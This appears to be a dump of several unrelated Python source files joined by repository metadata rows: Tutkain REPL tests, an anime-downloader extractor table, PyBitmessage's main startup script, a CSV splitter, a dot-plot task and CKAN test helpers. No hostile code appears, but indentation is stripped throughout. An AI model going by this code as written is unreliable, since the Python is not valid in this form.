def test_lookup_head(self):
self.set_view_content("(map inc )")
self.set_selections((9, 9))
self.view.run_command("tutkain_show_information", {
"selector": "variable.function",
"seek_backward": True
})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("lookup"),
edn.Keyword("named"): "map",
edn.Keyword("ns"): None,
edn.Keyword("dialect"): edn.Keyword("clj"),
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_issue_46(self):
code = """(apply str (repeat 9126 "x"))"""
self.set_view_content(code)
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context()
self.assertEquals(self.print_item("user", code), self.get_print())
retval = "x" * 9126
response = edn.kwmap({"tag": edn.Keyword("ret"), "val": retval})
self.assertEquals(code + "\n", self.server.recv())
self.server.send(response)
self.assertEqual({
"printable": retval,
"response": response
}, self.get_print())
def test_evaluate_dialect(self):
self.view.run_command("tutkain_evaluate", {"code": "(random-uuid)", "dialect": "cljs"})
# The server receives no message because the evaluation uses a
# different dialect than the server.
self.assertRaises(queue.Empty, lambda: self.server.recvq.get_nowait())
self.view.run_command("tutkain_evaluate", {"code": """(Integer/parseInt "42")""", "dialect": "clj"})
self.eval_context()
self.assertEquals("""(Integer/parseInt "42")\n""", self.server.recv())
self.get_print()
class TestJSClient(ViewTestCase):
@classmethod
def conduct_handshake(self):
server = self.server
# Client starts clojure.main/repl
server.recv()
# Client requests build IDs
server.recv()
# Server sends build ID list
server.send([
edn.Keyword("browser"),
edn.Keyword("node-script"),
edn.Keyword("npm")
])
# Client switches into the bootstrap namespace
server.recv()
server.send("nil\n")
# Client defines load-base64 function
server.recv()
server.send("#'tutkain.bootstrap/load-base64\n")
# Client loads modules
server.recv()
server.send("#'tutkain.format/pp-str")
server.recv()
server.send("#'tutkain.backchannel/open")
server.recv()
server.send("#'tutkain.repl/repl")
# Client starts REPL
server.recv()
with Server() as backchannel:
server.send({
edn.Keyword("host"): "localhost",
edn.Keyword("port"): backchannel.port
})
for _ in range(4):
backchannel.recv()
# Client sends version print
server.recv()
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): "ClojureScript 1.10.844"
})
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): "\\n"
})
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): "nil",
edn.Keyword("ns"): "cljs.user",
edn.Keyword("ms"): 0,
edn.Keyword("form"): """(println "ClojureScript" *clojurescript-version*)"""
})
# TODO: Add test for no runtime
return backchannel
@classmethod
def setUpClass(self):
super().setUpClass(syntax="ClojureScript (Tutkain).sublime-syntax")
start_logging(False)
def write_greeting(buf):
buf.write("shadow-cljs - REPL - see (help)\n")
buf.flush()
buf.write("To quit, type: :repl/quit\n")
buf.flush()
buf.write("shadow.user=> ")
buf.flush()
self.server = Server(greeting=write_greeting)
self.server.start()
self.client = JSClient(
source_root(),
self.server.host,
self.server.port,
lambda _, on_done: on_done(1)
)
self.server.executor.submit(self.client.connect)
dialect = edn.Keyword("cljs")
state.set_view_client(self.view, dialect, self.client)
repl_view = self.view.window().new_file()
views.configure(repl_view, dialect, self.client)
state.set_view_client(repl_view, dialect, self.client)
state.set_repl_view(repl_view, dialect)
self.backchannel = self.conduct_handshake()
@classmethod
def tearDownClass(self):
super().tearDownClass()
stop_logging()
if self.server:
self.server.stop()
if self.client:
self.client.halt()
def test_innermost(self):
self.set_view_content("(map inc (range 10))")
self.set_selections((9, 9))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.assertEquals("(range 10)\n", self.server.recv())
class TestBabashkaClient(ViewTestCase):
@classmethod
def conduct_handshake(self):
server = self.server
# Client starts io-prepl
server.recv()
# Client sends version print
server.recv()
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): """Babashka 0.3.6""",
})
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): "nil",
edn.Keyword("ns"): "user",
edn.Keyword("ms"): 0,
edn.Keyword("form"): """(println "Babashka" (System/getProperty "babashka.version"))""",
})
@classmethod
def setUpClass(self):
super().setUpClass(syntax="Babashka (Tutkain).sublime-syntax")
start_logging(False)
def write_greeting(buf):
buf.write("Babashka v0.3.6 REPL.\n")
buf.flush()
buf.write("Use :repl/quit or :repl/exit to quit the REPL.\n")
buf.flush()
buf.write("Clojure rocks, Bash reaches.\n")
buf.flush()
buf.write("\n")
buf.flush()
buf.write("user=> ")
buf.flush()
self.server = Server(greeting=write_greeting)
self.server.start()
self.client = BabashkaClient(
source_root(),
self.server.host,
self.server.port
)
self.server.executor.submit(self.client.connect)
dialect = edn.Keyword("bb")
state.set_view_client(self.view, dialect, self.client)
repl_view = self.view.window().new_file()
views.configure(repl_view, dialect, self.client)
state.set_view_client(repl_view, dialect, self.client)
state.set_repl_view(repl_view, dialect)
self.conduct_handshake()
# TODO: Extract into base class
@classmethod
def tearDownClass(self):
super().tearDownClass()
stop_logging()
if self.server:
self.server.stop()
if self.client:
self.client.halt()
def test_innermost(self):
self.set_view_content("(map inc (range 10))")
self.set_selections((9, 9))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.assertEquals("(range 10)\n", self.server.recv())
| 34.066019 | 109 | 0.570964 |
4a27f6086e40d5c3a7624d057288a4b8246d1325 | 2,019 | py | Python | anime_downloader/extractors/init.py | danielb2/anime-downloader | 0bebd6f9e8a7ea6264fcc6c4436570596f299213 | [
"Unlicense"
] | null | null | null | anime_downloader/extractors/init.py | danielb2/anime-downloader | 0bebd6f9e8a7ea6264fcc6c4436570596f299213 | [
"Unlicense"
] | null | null | null | anime_downloader/extractors/init.py | danielb2/anime-downloader | 0bebd6f9e8a7ea6264fcc6c4436570596f299213 | [
"Unlicense"
] | null | null | null | from importlib import import_module
ALL_EXTRACTORS = [
{
'sitename': 'rapidvideo',
'modulename': 'rapidvideo',
'regex': 'rapidvideo',
'class': 'RapidVideo'
},
{
'sitename': 'no_extractor',
'modulename': 'fake_extractor',
'regex': 'no_extractor',
'class': 'AnimeVideo',
},
{
'sitename': 'stream.moe',
'modulename': 'moe',
'regex': 'stream.moe',
'class': 'StreamMoe',
},
{
'sitename': 'streamango',
'modulename': 'streamango',
'regex': 'streamango',
'class': 'Streamango',
},
{
'sitename': 'mp4upload',
'modulename': 'mp4upload',
'regex': 'mp4upload',
'class': 'MP4Upload'
},
{
'sitename': 'kwik',
'modulename': 'kwik',
'regex': 'kwik',
'class': 'Kwik'
},
{
'sitename': 'trollvid',
'modulename': 'trollvid',
'regex': 'trollvid',
'class': 'Trollvid'
},
{
'sitename': 'mp4sh',
'modulename': 'mp4sh',
'regex': 'mp4sh',
'class': 'MP4Sh'
},
{
'sitename': 'yourupload',
'modulename': 'yourupload',
'regex': 'yourupload',
'class': 'Yourupload'
},
{
'sitename': 'vidstream',
'modulename': 'vidstream',
'regex': 'vidstream',
'class': 'VidStream'
},
{
'sitename': 'haloani',
'modulename': 'haloani',
'regex': 'haloani',
'class': 'Haloani'
},
{
'sitename': 'gcloud',
'modulename': 'gcloud',
'regex': 'gcloud',
'class': 'Gcloud'
},
]
def get_extractor(name):
for extractor in ALL_EXTRACTORS:
if extractor['regex'] in name.lower():
module = import_module(
'anime_downloader.extractors.{}'.format(
extractor['modulename'])
)
return getattr(module, extractor['class'])
| 23.206897 | 56 | 0.47053 |
4a27f967fd7493dfbdc90bd8055b1e598085138d | 18,038 | py | Python | src/bitmessagemain.py | kaue/PyBitmessage | 7b8bf082ff0d569f507d65e087000e4e3d6ccf3f | [
"MIT",
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/bitmessagemain.py | kaue/PyBitmessage | 7b8bf082ff0d569f507d65e087000e4e3d6ccf3f | [
"MIT",
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/bitmessagemain.py | kaue/PyBitmessage | 7b8bf082ff0d569f507d65e087000e4e3d6ccf3f | [
"MIT",
"BSD-2-Clause-FreeBSD"
] | null | null | null | #!/usr/bin/python2.7
"""
The PyBitmessage startup script
"""
# Copyright (c) 2012-2016 Jonathan Warren
# Copyright (c) 2012-2020 The Bitmessage developers
# Distributed under the MIT/X11 software license. See the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Right now, PyBitmessage only support connecting to stream 1. It doesn't
# yet contain logic to expand into further streams.
import os
import sys
app_dir = os.path.dirname(os.path.abspath(__file__))
os.chdir(app_dir)
sys.path.insert(0, app_dir)
import depends
depends.check_dependencies()
import ctypes
import getopt
import multiprocessing
# Used to capture a Ctrl-C keypress so that Bitmessage can shutdown gracefully.
import signal
import socket
import threading
import time
import traceback
from struct import pack
import defaults
import shared
import shutdown
import state
from bmconfigparser import BMConfigParser
from debug import logger # this should go before any threads
from helper_startup import (
adjustHalfOpenConnectionsLimit, start_proxyconfig)
from inventory import Inventory
# Network objects and threads
from network import (
BMConnectionPool, Dandelion, AddrThread, AnnounceThread, BMNetworkThread,
InvThread, ReceiveQueueThread, DownloadThread, UploadThread
)
from network.knownnodes import readKnownNodes
from singleinstance import singleinstance
# Synchronous threads
from threads import (
set_thread_name, printLock,
addressGenerator, objectProcessor, singleCleaner, singleWorker, sqlThread)
def _fixSocket():
if sys.platform.startswith('linux'):
socket.SO_BINDTODEVICE = 25
if not sys.platform.startswith('win'):
return
# Python 2 on Windows doesn't define a wrapper for
# socket.inet_ntop but we can make one ourselves using ctypes
if not hasattr(socket, 'inet_ntop'):
addressToString = ctypes.windll.ws2_32.WSAAddressToStringA
def inet_ntop(family, host):
"""Converting an IP address in packed
binary format to string format"""
if family == socket.AF_INET:
if len(host) != 4:
raise ValueError("invalid IPv4 host")
host = pack("hH4s8s", socket.AF_INET, 0, host, "\0" * 8)
elif family == socket.AF_INET6:
if len(host) != 16:
raise ValueError("invalid IPv6 host")
host = pack("hHL16sL", socket.AF_INET6, 0, 0, host, 0)
else:
raise ValueError("invalid address family")
buf = "\0" * 64
lengthBuf = pack("I", len(buf))
addressToString(host, len(host), None, buf, lengthBuf)
return buf[0:buf.index("\0")]
socket.inet_ntop = inet_ntop
# Same for inet_pton
if not hasattr(socket, 'inet_pton'):
stringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
def inet_pton(family, host):
"""Converting an IP address in string format
to a packed binary format"""
buf = "\0" * 28
lengthBuf = pack("I", len(buf))
if stringToAddress(str(host),
int(family),
None,
buf,
lengthBuf) != 0:
raise socket.error("illegal IP address passed to inet_pton")
if family == socket.AF_INET:
return buf[4:8]
elif family == socket.AF_INET6:
return buf[8:24]
else:
raise ValueError("invalid address family")
socket.inet_pton = inet_pton
# These sockopts are needed on for IPv6 support
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, 'IPV6_V6ONLY'):
socket.IPV6_V6ONLY = 27
def signal_handler(signum, frame):
"""Single handler for any signal sent to pybitmessage"""
process = multiprocessing.current_process()
thread = threading.current_thread()
logger.error(
'Got signal %i in %s/%s',
signum, process.name, thread.name
)
if process.name == "RegExParser":
# on Windows this isn't triggered, but it's fine,
# it has its own process termination thing
raise SystemExit
if "PoolWorker" in process.name:
raise SystemExit
if thread.name not in ("PyBitmessage", "MainThread"):
return
logger.error("Got signal %i", signum)
# there are possible non-UI variants to run bitmessage
# which should shutdown especially test-mode
if state.thisapp.daemon or not state.enableGUI:
shutdown.doCleanShutdown()
else:
print('# Thread: %s(%d)' % (thread.name, thread.ident))
for filename, lineno, name, line in traceback.extract_stack(frame):
print('File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
print(' %s' % line.strip())
print('Unfortunately you cannot use Ctrl+C when running the UI'
' because the UI captures the signal.')
class Main(object):
"""Main PyBitmessage class"""
def start(self):
"""Start main application"""
# pylint: disable=too-many-statements,too-many-branches,too-many-locals
_fixSocket()
adjustHalfOpenConnectionsLimit()
config = BMConfigParser()
daemon = config.safeGetBoolean('bitmessagesettings', 'daemon')
try:
opts, _ = getopt.getopt(
sys.argv[1:], "hcdt",
["help", "curses", "daemon", "test"])
except getopt.GetoptError:
self.usage()
sys.exit(2)
for opt, _ in opts:
if opt in ("-h", "--help"):
self.usage()
sys.exit()
elif opt in ("-d", "--daemon"):
daemon = True
elif opt in ("-c", "--curses"):
state.curses = True
elif opt in ("-t", "--test"):
state.testmode = True
if os.path.isfile(os.path.join(
state.appdata, 'unittest.lock')):
daemon = True
state.enableGUI = False # run without a UI
# Fallback: in case when no api command was issued
state.last_api_response = time.time()
# Apply special settings
config.set(
'bitmessagesettings', 'apienabled', 'true')
config.set(
'bitmessagesettings', 'apiusername', 'username')
config.set(
'bitmessagesettings', 'apipassword', 'password')
config.set(
'bitmessagesettings', 'apivariant', 'legacy')
config.set(
'bitmessagesettings', 'apinotifypath',
os.path.join(app_dir, 'tests', 'apinotify_handler.py')
)
if daemon:
state.enableGUI = False # run without a UI
if state.enableGUI and not state.curses and not depends.check_pyqt():
sys.exit(
'PyBitmessage requires PyQt unless you want'
' to run it as a daemon and interact with it'
' using the API. You can download PyQt from '
'http://www.riverbankcomputing.com/software/pyqt/download'
' or by searching Google for \'PyQt Download\'.'
' If you want to run in daemon mode, see '
'https://bitmessage.org/wiki/Daemon\n'
'You can also run PyBitmessage with'
' the new curses interface by providing'
' \'-c\' as a commandline argument.'
)
# is the application already running? If yes then exit.
state.thisapp = singleinstance("", daemon)
if daemon:
with printLock:
print('Running as a daemon. Send TERM signal to end.')
self.daemonize()
self.setSignalHandler()
set_thread_name("PyBitmessage")
state.dandelion = config.safeGetInt('network', 'dandelion')
# dandelion requires outbound connections, without them,
# stem objects will get stuck forever
if state.dandelion and not config.safeGetBoolean(
'bitmessagesettings', 'sendoutgoingconnections'):
state.dandelion = 0
if state.testmode or config.safeGetBoolean(
'bitmessagesettings', 'extralowdifficulty'):
defaults.networkDefaultProofOfWorkNonceTrialsPerByte = int(
defaults.networkDefaultProofOfWorkNonceTrialsPerByte / 100)
defaults.networkDefaultPayloadLengthExtraBytes = int(
defaults.networkDefaultPayloadLengthExtraBytes / 100)
readKnownNodes()
# Not needed if objproc is disabled
if state.enableObjProc:
# Start the address generation thread
addressGeneratorThread = addressGenerator()
# close the main program even if there are threads left
addressGeneratorThread.daemon = True
addressGeneratorThread.start()
# Start the thread that calculates POWs
singleWorkerThread = singleWorker()
# close the main program even if there are threads left
singleWorkerThread.daemon = True
singleWorkerThread.start()
# Start the SQL thread
sqlLookup = sqlThread()
# DON'T close the main program even if there are threads left.
# The closeEvent should command this thread to exit gracefully.
sqlLookup.daemon = False
sqlLookup.start()
Inventory() # init
# init, needs to be early because other thread may access it early
Dandelion()
# Enable object processor and SMTP only if objproc enabled
if state.enableObjProc:
# SMTP delivery thread
if daemon and config.safeGet(
'bitmessagesettings', 'smtpdeliver', '') != '':
from class_smtpDeliver import smtpDeliver
smtpDeliveryThread = smtpDeliver()
smtpDeliveryThread.start()
# SMTP daemon thread
if daemon and config.safeGetBoolean(
'bitmessagesettings', 'smtpd'):
from class_smtpServer import smtpServer
smtpServerThread = smtpServer()
smtpServerThread.start()
# Start the thread that calculates POWs
objectProcessorThread = objectProcessor()
# DON'T close the main program even the thread remains.
# This thread checks the shutdown variable after processing
# each object.
objectProcessorThread.daemon = False
objectProcessorThread.start()
# Start the cleanerThread
singleCleanerThread = singleCleaner()
# close the main program even if there are threads left
singleCleanerThread.daemon = True
singleCleanerThread.start()
# Not needed if objproc disabled
if state.enableObjProc:
shared.reloadMyAddressHashes()
shared.reloadBroadcastSendersForWhichImWatching()
# API is also objproc dependent
if config.safeGetBoolean('bitmessagesettings', 'apienabled'):
import api # pylint: disable=relative-import
singleAPIThread = api.singleAPI()
# close the main program even if there are threads left
singleAPIThread.daemon = True
singleAPIThread.start()
# start network components if networking is enabled
if state.enableNetwork:
start_proxyconfig()
BMConnectionPool().connectToStream(1)
asyncoreThread = BMNetworkThread()
asyncoreThread.daemon = True
asyncoreThread.start()
for i in range(config.getint('threads', 'receive')):
receiveQueueThread = ReceiveQueueThread(i)
receiveQueueThread.daemon = True
receiveQueueThread.start()
announceThread = AnnounceThread()
announceThread.daemon = True
announceThread.start()
state.invThread = InvThread()
state.invThread.daemon = True
state.invThread.start()
state.addrThread = AddrThread()
state.addrThread.daemon = True
state.addrThread.start()
state.downloadThread = DownloadThread()
state.downloadThread.daemon = True
state.downloadThread.start()
state.uploadThread = UploadThread()
state.uploadThread.daemon = True
state.uploadThread.start()
if config.safeGetBoolean('bitmessagesettings', 'upnp'):
import upnp
upnpThread = upnp.uPnPThread()
upnpThread.start()
else:
# Populate with hardcoded value (same as connectToStream above)
state.streamsInWhichIAmParticipating.append(1)
if not daemon and state.enableGUI:
if state.curses:
if not depends.check_curses():
sys.exit()
print('Running with curses')
import bitmessagecurses
bitmessagecurses.runwrapper()
elif state.kivy:
config.remove_option('bitmessagesettings', 'dontconnect')
# from bitmessagekivy.mpybit import NavigateApp
# NavigateApp().run()
else:
import bitmessageqt
bitmessageqt.run()
else:
config.remove_option('bitmessagesettings', 'dontconnect')
if daemon:
while state.shutdown == 0:
time.sleep(1)
if (
state.testmode
and time.time() - state.last_api_response >= 30
):
self.stop()
elif not state.enableGUI:
state.enableGUI = True
try:
# pylint: disable=relative-import
from tests import core as test_core
except ImportError:
self.stop()
return
test_core_result = test_core.run()
self.stop()
test_core.cleanup()
sys.exit(
'Core tests failed!'
if test_core_result.errors or test_core_result.failures
else 0
)
@staticmethod
def daemonize():
"""Running as a daemon. Send signal in end."""
grandfatherPid = os.getpid()
parentPid = None
try:
if os.fork():
# unlock
state.thisapp.cleanup()
# wait until grandchild ready
while True:
time.sleep(1)
os._exit(0) # pylint: disable=protected-access
except AttributeError:
# fork not implemented
pass
else:
parentPid = os.getpid()
state.thisapp.lock() # relock
os.umask(0)
try:
os.setsid()
except AttributeError:
# setsid not implemented
pass
try:
if os.fork():
# unlock
state.thisapp.cleanup()
# wait until child ready
while True:
time.sleep(1)
os._exit(0) # pylint: disable=protected-access
except AttributeError:
# fork not implemented
pass
else:
state.thisapp.lock() # relock
state.thisapp.lockPid = None # indicate we're the final child
sys.stdout.flush()
sys.stderr.flush()
if not sys.platform.startswith('win'):
si = file(os.devnull, 'r')
so = file(os.devnull, 'a+')
se = file(os.devnull, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
if parentPid:
# signal ready
os.kill(parentPid, signal.SIGTERM)
os.kill(grandfatherPid, signal.SIGTERM)
@staticmethod
def setSignalHandler():
"""Setting the Signal Handler"""
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# signal.signal(signal.SIGINT, signal.SIG_DFL)
@staticmethod
def usage():
"""Displaying the usages"""
print('Usage: ' + sys.argv[0] + ' [OPTIONS]')
print('''
Options:
-h, --help show this help message and exit
-c, --curses use curses (text mode) interface
-d, --daemon run in daemon (background) mode
-t, --test dryrun, make testing
All parameters are optional.
''')
@staticmethod
def stop():
"""Stop main application"""
with printLock:
print('Stopping Bitmessage Deamon.')
shutdown.doCleanShutdown()
# .. todo:: nice function but no one is using this
@staticmethod
def getApiAddress():
"""This function returns API address and port"""
if not BMConfigParser().safeGetBoolean(
'bitmessagesettings', 'apienabled'):
return None
address = BMConfigParser().get('bitmessagesettings', 'apiinterface')
port = BMConfigParser().getint('bitmessagesettings', 'apiport')
return {'address': address, 'port': port}
def main():
"""Triggers main module"""
mainprogram = Main()
mainprogram.start()
if __name__ == "__main__":
main()
# So far, the creation of and management of the Bitmessage protocol and this
# client is a one-man operation. Bitcoin tips are quite appreciated.
# 1H5XaDA6fYENLbknwZyjiYXYPQaFjjLX2u
| 36.293763 | 79 | 0.581328 |
4a27fa3cc31c48f3def1383e05bed2d84b896810 | 3,836 | py | Python | amp/data_utils/csv.py | szczurek-lab/hydramp | be4eb6defe227fe3fef4fe9882a85a0b717301c6 | [
"MIT"
] | 4 | 2022-03-04T15:57:24.000Z | 2022-03-24T11:13:01.000Z | amp/data_utils/csv.py | szczurek-lab/hydramp | be4eb6defe227fe3fef4fe9882a85a0b717301c6 | [
"MIT"
] | null | null | null | amp/data_utils/csv.py | szczurek-lab/hydramp | be4eb6defe227fe3fef4fe9882a85a0b717301c6 | [
"MIT"
] | 1 | 2022-03-07T16:44:11.000Z | 2022-03-07T16:44:11.000Z | import csv
from sklearn.model_selection import train_test_split
from amp.data_utils import sequence
MIN_LENGTH = 0
INPUT_PATH = 'data/interim/Uniprot_0_200_no_duplicates.csv'
class CSVSplitter:
"""Perform splitting csv file in training, test and validation subsets."""
def __init__(
self,
input_file,
min_length,
max_length,
output_to='data/processed',
test_size: int=0.1,
val_size: int=0.1,
):
self.input_file = input_file
self.name = f'{output_to}/Uniprot_{min_length}_{max_length}'
self.test_size = test_size + val_size
self.val_size = val_size / self.test_size
def get_row_count(self):
with open(self.input_file) as f:
return sum(1 for line in f)
def get_indices(self):
row_count = self.get_row_count()
partition = {}
indices_train, indices_test = train_test_split(
range(1, row_count + 1),
test_size=self.test_size,
random_state=1
)
indices_test, indices_val = train_test_split(
indices_test,
test_size=self.val_size,
random_state=1
)
for i in indices_train:
partition[i] = 'train'
for i in indices_test:
partition[i] = 'test'
for i in indices_val:
partition[i] = 'val'
# partition['train'] = indices_train
# partition['test'] = indices_test
# partition['val'] = indices_val
return partition
def csv_partition(self, indices):
train_file = f'{self.name}_train.csv'
test_file = f'{self.name}_test.csv'
val_file = f'{self.name}_val.csv'
with open(self.input_file) as csv_input, \
open(train_file, 'w') as csv_train, \
open(test_file, 'w') as csv_test, \
open(val_file, 'w') as csv_val:
reader = csv.reader(csv_input)
train_writer = csv.writer(csv_train)
test_writer = csv.writer(csv_test)
val_writer = csv.writer(csv_val)
train_writer.writerow(['Name', 'Sequence'])
test_writer.writerow(['Name', 'Sequence'])
val_writer.writerow(['Name', 'Sequence'])
for line_number, row in enumerate(reader):
if line_number == 0:
continue
if indices[line_number] == 'train':
train_writer.writerow(row)
elif indices[line_number] == 'test':
test_writer.writerow(row)
else:
val_writer.writerow(row)
def split(self):
partition = self.get_indices()
self.csv_partition(partition)
def get_various_lengths_csv(
max_lengths: list,
min_length:int =MIN_LENGTH,
input_path= INPUT_PATH,
output_to='data/interim',
):
list_of_outputs = [f'{output_to}/Uniprot_{min_length}_{max_len}.csv' for max_len in max_lengths]
with open(input_path) as input_file:
reader = csv.reader(input_file)
writers = []
output_files = []
for file_name in list_of_outputs:
file = open(file_name, 'w')
output_files.append(file)
writers.append(csv.writer(file))
# Write headers in each file
for writer in writers:
writer.writerow(['Name', 'Sequence'])
for line_number, row in enumerate(reader):
if line_number == 0:
continue
seq = row[1]
for writer, max_len in zip(writers, max_lengths):
if sequence.check_length(seq, min_length, max_len):
writer.writerow(row)
for file in output_files:
file.close() | 30.204724 | 100 | 0.570647 |
4a27fdeb6bc3828e758ef6e52c8b7e33bd457611 | 2,278 | py | Python | python/src/worker/tasks/dotplot.py | hms-dbmi-cellenics/worker | 9eb9f9823e0c194384a207c56ffcc487873a481a | [
"MIT"
] | 1 | 2022-03-28T10:28:53.000Z | 2022-03-28T10:28:53.000Z | python/src/worker/tasks/dotplot.py | hms-dbmi-cellenics/worker | 9eb9f9823e0c194384a207c56ffcc487873a481a | [
"MIT"
] | 30 | 2022-01-12T20:32:18.000Z | 2022-03-25T08:08:26.000Z | python/src/worker/tasks/dotplot.py | hms-dbmi-cellenics/worker | 9eb9f9823e0c194384a207c56ffcc487873a481a | [
"MIT"
] | 1 | 2022-03-07T12:00:12.000Z | 2022-03-07T12:00:12.000Z | import json
import backoff
import requests
from aws_xray_sdk.core import xray_recorder
from exceptions import raise_if_error
from ..config import config
from ..helpers.s3 import get_cell_sets
from ..result import Result
from ..tasks import Task
class DotPlot(Task):
def __init__(self, msg):
super().__init__(msg)
self.experiment_id = config.EXPERIMENT_ID
def _format_result(self, result):
# Return a list of formatted results.
return Result(result)
def _format_request(self):
# getting cell ids for the groups we want to display.
cellSets = get_cell_sets(self.experiment_id)
# Getting the cell ids for subsetting the seurat object with a group of cells.
groupByCellSet = [
cellSet
for cellSet in cellSets
if cellSet["key"] == self.task_def["groupBy"]
][0]
filterBy = self.task_def["filterBy"]
applyFilter = filterBy["group"].lower() != "all"
filterByCellSet = groupByCellSet
if applyFilter:
children = [
cellSet for cellSet in cellSets if cellSet["key"] == filterBy["group"]
][0]["children"]
filterByCellSet = [
child for child in children if child["key"] == filterBy["key"]
][0]
request = {
"useMarkerGenes": self.task_def["useMarkerGenes"],
"numberOfMarkers": self.task_def["numberOfMarkers"],
"customGenesList": self.task_def["customGenesList"],
"groupBy": groupByCellSet,
"filterBy": filterByCellSet,
"applyFilter": applyFilter,
}
return request
@xray_recorder.capture("DotPlot.compute")
@backoff.on_exception(
backoff.expo, requests.exceptions.RequestException, max_time=30
)
def compute(self):
request = self._format_request()
response = requests.post(
f"{config.R_WORKER_URL}/v0/runDotPlot",
headers={"content-type": "application/json"},
data=json.dumps(request),
)
response.raise_for_status()
result = response.json()
raise_if_error(result)
data = result.get("data")
return self._format_result(data)
| 28.835443 | 86 | 0.615013 |
4a27ff974c8404908d66290e12fe1f87d84be8ad | 11,091 | py | Python | ckan/tests/legacy/__init__.py | hackhit/ckan | 53b9442509b46525d653f2f705e98319752ceb2d | [
"BSD-3-Clause"
] | 6 | 2015-11-09T00:44:51.000Z | 2019-11-21T14:56:01.000Z | ckan/tests/legacy/__init__.py | hackhit/ckan | 53b9442509b46525d653f2f705e98319752ceb2d | [
"BSD-3-Clause"
] | 39 | 2015-02-18T17:32:23.000Z | 2022-03-11T18:03:36.000Z | ckan/tests/legacy/__init__.py | hackhit/ckan | 53b9442509b46525d653f2f705e98319752ceb2d | [
"BSD-3-Clause"
] | 17 | 2015-03-13T18:05:05.000Z | 2020-11-06T13:55:32.000Z | # encoding: utf-8
"""Pylons application test package
When the test runner finds and executes tests within this directory,
this file will be loaded to setup the test environment.
It registers the root directory of the project in sys.path and
pkg_resources, in case the project hasn't been installed with
setuptools.
"""
import os
from unittest import TestCase
import pytest
from ckan.common import config
from six import text_type
from ckan.lib.create_test_data import CreateTestData
from ckan.lib import search
import ckan.lib.helpers as h
import ckan.model as model
import ckan.tests.helpers as helpers
# evil hack as url_for is passed out
url_for = h.url_for
__all__ = [
"url_for",
"TestController",
"CreateTestData",
"TestSearchIndexer",
"CheckMethods",
"CommonFixtureMethods",
"TestCase",
"CkanServerCase",
"call_action_api",
"BaseCase",
"here_dir",
"conf_dir",
"is_datastore_supported",
]
here_dir = os.path.dirname(os.path.abspath(__file__))
conf_dir = os.path.dirname(os.path.dirname(here_dir))
class BaseCase(object):
def setup(self):
pass
def teardown(self):
pass
@staticmethod
def _system(cmd):
import commands
(status, output) = commands.getstatusoutput(cmd)
if status:
raise Exception("Couldn't execute cmd: %s: %s" % (cmd, output))
@classmethod
def _paster(cls, cmd, config_path_rel):
config_path = os.path.join(config["here"], config_path_rel)
cls._system("paster --plugin ckan %s --config=%s" % (cmd, config_path))
class CommonFixtureMethods(BaseCase):
@classmethod
def create_package(self, data={}, **kwds):
# Todo: A simpler method for just creating a package.
CreateTestData.create_arbitrary(package_dicts=[data or kwds])
@classmethod
def create_user(cls, **kwds):
user = model.User(name=kwds["name"])
model.Session.add(user)
model.Session.commit()
model.Session.remove()
return user
@staticmethod
def get_package_by_name(package_name):
return model.Package.by_name(package_name)
@staticmethod
def get_group_by_name(group_name):
return model.Group.by_name(group_name)
@staticmethod
def get_user_by_name(name):
return model.User.by_name(name)
@staticmethod
def get_tag_by_name(name):
return model.Tag.by_name(name)
def purge_package_by_name(self, package_name):
package = self.get_package_by_name(package_name)
if package:
package.purge()
model.repo.commit_and_remove()
@classmethod
def purge_packages(cls, pkg_names):
for pkg_name in pkg_names:
pkg = model.Package.by_name(text_type(pkg_name))
if pkg:
pkg.purge()
model.repo.commit_and_remove()
@classmethod
def purge_all_packages(self):
all_pkg_names = [
pkg.name for pkg in model.Session.query(model.Package)
]
self.purge_packages(all_pkg_names)
def purge_group_by_name(self, group_name):
group = self.get_group_by_name(group_name)
if group:
group.purge()
model.repo.commit_and_remove()
@classmethod
def clear_all_tst_ratings(self):
ratings = (
model.Session.query(model.Rating)
.filter_by(package=model.Package.by_name(u"annakarenina"))
.all()
)
ratings += (
model.Session.query(model.Rating)
.filter_by(package=model.Package.by_name(u"warandpeace"))
.all()
)
for rating in ratings[:]:
model.Session.delete(rating)
model.repo.commit_and_remove()
@property
def war(self):
return self.get_package_by_name(u"warandpeace")
@property
def anna(self):
return self.get_package_by_name(u"annakarenina")
@property
def roger(self):
return self.get_group_by_name(u"roger")
@property
def david(self):
return self.get_group_by_name(u"david")
@property
def russian(self):
return self.get_tag_by_name(u"russian")
@property
def tolstoy(self):
return self.get_tag_by_name(u"tolstoy")
@property
def flexible_tag(self):
return self.get_tag_by_name(u"Flexible \u30a1")
class CheckMethods(BaseCase):
def assert_true(self, value):
assert value, "Not true: '%s'" % value
def assert_false(self, value):
assert not value, "Not false: '%s'" % value
def assert_equal(self, value1, value2):
assert value1 == value2, "Not equal: %s" % ((value1, value2),)
def assert_isinstance(self, value, check):
assert isinstance(value, check), "Not an instance: %s" % (
(value, check),
)
def assert_raises(self, exception_class, callable, *args, **kwds):
try:
callable(*args, **kwds)
except exception_class:
pass
else:
assert False, "Didn't raise '%s' when calling: %s with %s" % (
exception_class,
callable,
(args, kwds),
)
def assert_contains(self, sequence, item):
assert item in sequence, "Sequence %s does not contain item: %s" % (
sequence,
item,
)
def assert_missing(self, sequence, item):
assert item not in sequence, "Sequence %s does contain item: %s" % (
sequence,
item,
)
def assert_len(self, sequence, count):
